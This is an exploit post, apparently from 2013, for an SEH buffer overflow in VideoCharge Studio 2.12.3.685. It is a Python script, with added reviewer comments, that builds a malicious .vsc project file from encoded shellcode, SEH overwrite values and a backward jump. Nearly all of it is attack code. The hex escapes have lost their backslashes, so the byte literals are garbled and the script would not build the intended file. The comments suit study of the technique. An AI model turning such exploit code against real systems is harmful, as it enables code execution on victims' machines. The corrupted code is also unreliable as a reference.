
VideoCharge Studio SEH Buffer Overflow

Posted on 28 October 2013

#!/usr/bin/python
# Exploit Title: VideoCharge Studio SEH Buffer Overflow
# Date found: 27.10.2013
# Exploit Author: metacom
# URL: http://www.videocharge.com/download.php
# Software Link: www.videocharge.com/download/VideoChargeStudio_Install.exe
# Version: 2.12.3.685
# Tested on: Windows XP SP2
# Poc demo:http://bit.ly/1axkW74
#
# Proof-of-concept file generator: writes a VideoCharge Studio project file
# (POC.vsc) whose <Value name="Name" ... value=""> attribute is padded far
# beyond what the parser expects, overwriting the SEH record.  The artefact a
# defender would look for is therefore a .vsc document with an abnormally long
# "value" attribute followed by non-text bytes.
#
# NOTE(review): this is Python 2 code -- the bare `print "..."` statement in the
# except branch is a SyntaxError on Python 3.
# NOTE(review): as reproduced on this page every `\x` escape has lost its
# backslash (e.g. `x3C` instead of the `\x3C` escape), so the literals below are
# plain ASCII text here and their lengths/bytes differ from the author's file.
# The decodings in the comments assume the original hex escapes.
import struct
# XML prologue and opening structure of the .vsc file; the hex decodes to
# `<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.12.3.685">`
# followed by nested <cols>/<Property> elements, ending mid-attribute at
# `<Value name="Name" type="8" value="` so the payload lands inside that value.
head=("x3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22x31x2Ex30x22"
"x20x65x6Ex63x6Fx64x69x6Ex67x3Dx22x57x69x6Ex64x6Fx77x73x2Dx31x32"
"x35x32x22x20x3Fx3Ex3Cx63x6Fx6Ex66x69x67x20x76x65x72x3Dx22x32x2E"
"x31x32x2Ex33x2Ex36x38x35x22x3Ex0Ax0Ax3Cx63x6Fx6Cx73x20x6Ex61x6D"
"x65x3Dx22x46x69x6Cx65x73x22x2Fx3Ex0Ax0Ax3Cx63x6Fx6Cx73x20x6Ex61"
"x6Dx65x3Dx22x50x72x6Fx66x69x6Cx65x73x22x3Ex0Ax0Ax3Cx50x72x6Fx70"
"x65x72x74x79x20x6Ex61x6Dx65x3Dx22x50x72x6Fx66x69x6Cx65x22x3Ex0A"
"x0Ax3Cx63x6Fx6Cx73x20x6Ex61x6Dx65x3Dx22x46x6Fx72x6Dx61x74x73x22"
"x3Ex0Ax0Ax3Cx50x72x6Fx70x65x72x74x79x20x6Ex61x6Dx65x3Dx22x53x74"
"x72x65x61x6Dx22x3Ex0Ax0Ax3Cx56x61x6Cx75x65x20x6Ex61x6Dx65x3Dx22"
"x4Ex61x6Dx65x22x20x74x79x70x65x3Dx22x38x22x20x76x61x6Cx75x65x3Dx22")
# Encoder-generated payload (the author's generation command is recorded in the
# two comment lines below).  The bad-character list it excludes is exactly the
# set of bytes that would terminate or corrupt the XML attribute: NUL, LF, CR,
# '<', '"', '&'.  The bytes themselves are opaque and are not documented further.
#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai
#-b 'x00x0ax0dx3cx22x26' -t c
shellcode = ("xbbx80xa3x02xb2xdaxccxd9x74x24xf4x5ex31xc9xb1"
"x33x31x5ex12x03x5ex12x83x6ex5fxe0x47x92x48x6c"
"xa7x6ax89x0fx21x8fxb8x1dx55xc4xe9x91x1dx88x01"
"x59x73x38x91x2fx5cx4fx12x85xbax7exa3x2bx03x2c"
"x67x2dxffx2exb4x8dx3exe1xc9xccx07x1fx21x9cxd0"
"x54x90x31x54x28x29x33xbax27x11x4bxbfxf7xe6xe1"
"xbex27x56x7dx88xdfxdcxd9x29xdex31x3ax15xa9x3e"
"x89xedx28x97xc3x0ex1bxd7x88x30x94xdaxd1x75x12"
"x05xa4x8dx61xb8xbfx55x18x66x35x48xbaxedxedxa8"
"x3bx21x6bx3ax37x8exffx64x5bx11xd3x1ex67x9axd2"
"xf0xeexd8xf0xd4xabxbbx99x4dx11x6dxa5x8exfdxd2"
"x03xc4xefx07x35x87x65xd9xb7xbdxc0xd9xc7xbdx62"
"xb2xf6x36xedxc5x06x9dx4ax39x4dxbcxfaxd2x08x54"
"xbfxbexaax82x83xc6x28x27x7bx3dx30x42x7ex79xf6"
"xbexf2x12x93xc0xa1x13xb6xa2x24x80x5ax0bxc3x20"
"xf8x53")
# 824 is presumably the distance from the start of the value to the SEH record
# (not derivable from the page); the padding is sized so that
# len(buffer) + len(shellcode) == junk, i.e. the payload sits directly before
# the overwritten handler.  With the de-escaped literals on this page
# len(shellcode) is far larger than in the author's file, so the subtraction
# here would go negative and yield an empty buffer.
junk = 824
buffer= "x41" * (junk - len(shellcode))
shellcode= shellcode  # no-op self-assignment; harmless
# Next-SEH slot: `EB 06` is a two-byte short jump over the handler address,
# padded with two NOPs (`90 90`).
nseh= "xEBx06x90x90"
# Handler slot, packed little-endian.  The page does not say which module this
# address lives in or what instruction sequence it points at.
seh= struct.pack("<L",0x61B811F1)
# `E9` + rel32 0xFFFFFD3F: a near jump with a negative displacement, i.e. back
# into the buffer that precedes the SEH record (where the payload was placed).
jump="xe9x3fxfdxffxff"
# Closing quote/element and the remainder of the document: decodes to
# `"/>` ... `</Property>` `</cols>` `<cols name="Romania Security Team"/>`
# `</Property>` `</cols>` `</config>`, keeping the file well-formed enough
# for the application to parse up to the oversized attribute.
end=("x22x2Fx3Ex0Ax0Ax3Cx2Fx50x72x6Fx70x65x72x74x79x3Ex0Ax0Ax3Cx2F"
"x63x6Fx6Cx73x3Ex0Ax0Ax3Cx63x6Fx6Cx73x20x6Ex61x6Dx65x3Dx22x52x6F"
"x6Dx61x6Ex69x61x20x53x65x63x75x72x69x74x79x20x54x65x61x6Dx22x2F"
"x3Ex0Ax0Ax3Cx2Fx50x72x6Fx70x65x72x74x79x3Ex0Ax0Ax3Cx2Fx63x6Fx6C"
"x73x3Ex0Ax0Ax3Cx2Fx63x6Fx6Ex66x69x67x3E")
# Final layout: header, 0x41 padding, payload, nSEH, SEH, backward jump, tail.
off = head + buffer + shellcode + nseh + seh + jump + end
# Writes the crafted project file to the current directory.  The file is opened
# in text mode ('w'), so on Windows any 0x0A byte would be expanded to CR LF --
# the author tested on XP, so the offsets above were evidently measured with
# that translation in effect (hedged: not stated on the page).
try:
        out_file = open("POC.vsc",'w')
        out_file.write(off)
        out_file.close()
        print("[*] Malicious vsc file created successfully")
# Bare except: swallows every error (permissions, disk full, KeyboardInterrupt)
# and reports only a generic message; a narrower `except IOError` would be the
# usual choice.  This line is a Python 2 print statement.
except:
        print "[!] Error creating file"

 
